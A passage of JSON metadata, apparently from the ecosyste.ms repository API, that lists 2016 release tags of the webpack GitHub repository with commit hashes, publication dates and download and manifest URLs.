ebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/ho